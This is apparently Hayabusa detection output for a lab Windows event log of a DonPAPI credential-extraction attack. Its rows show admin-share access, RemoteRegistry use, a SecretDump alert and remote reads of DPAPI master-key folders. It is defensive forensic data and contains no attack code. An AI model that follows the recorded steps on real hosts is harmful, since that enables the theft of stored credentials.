2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:56.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:56.817 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8723c99 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:56.829 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:56.929 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\ZuExrArX.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:56.929 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:56.929 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:58.454 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x33c | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.403 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\XwYybEmH.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.403 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.403 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.693 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.693 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.693 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.709 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.714 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\1d0d5e15-3dd4-4689-a6c8-b3f4a523f317 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.716 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.732 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\4940c1c2-798b-4291-9cbf-56ba1bc56acd | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.732 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.732 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\dd10a8dd-2e01-4512-9e4e-0ab8b174b115 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.784 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234\eca8ffbf-fcd6-4e81-a424-36116606541f | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.784 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.784 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.800 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.818 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\084aa96d-4fd0-4004-802f-dad10353ce8b | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.818 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.818 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.833 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\0f51cf18-7e42-4905-a5e2-4dcd2016ba02 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.833 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.849 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\48f8844f-6a0e-44cc-b4c9-4b6aeb83bdcd | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.849 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\5dd255ba-fb23-45a9-8f1c-3efe30e43a08 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.849 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.865 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\7ac45d37-fa59-41b4-a80a-cb9224e97518 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.865 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\85b74294-ac3a-4166-8db9-0eb9596ae80e | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\cbd1402e-96f2-4c55-a4b3-990c71387659 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.896 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\e1d47273-0077-4091-9c01-88df1f2b8983 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.896 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\0d670005-17c4-4245-8305-54f955fcb04a | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.927 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\521f9c27-57b0-4cbb-bba2-5155c9b3fdbd | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.927 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
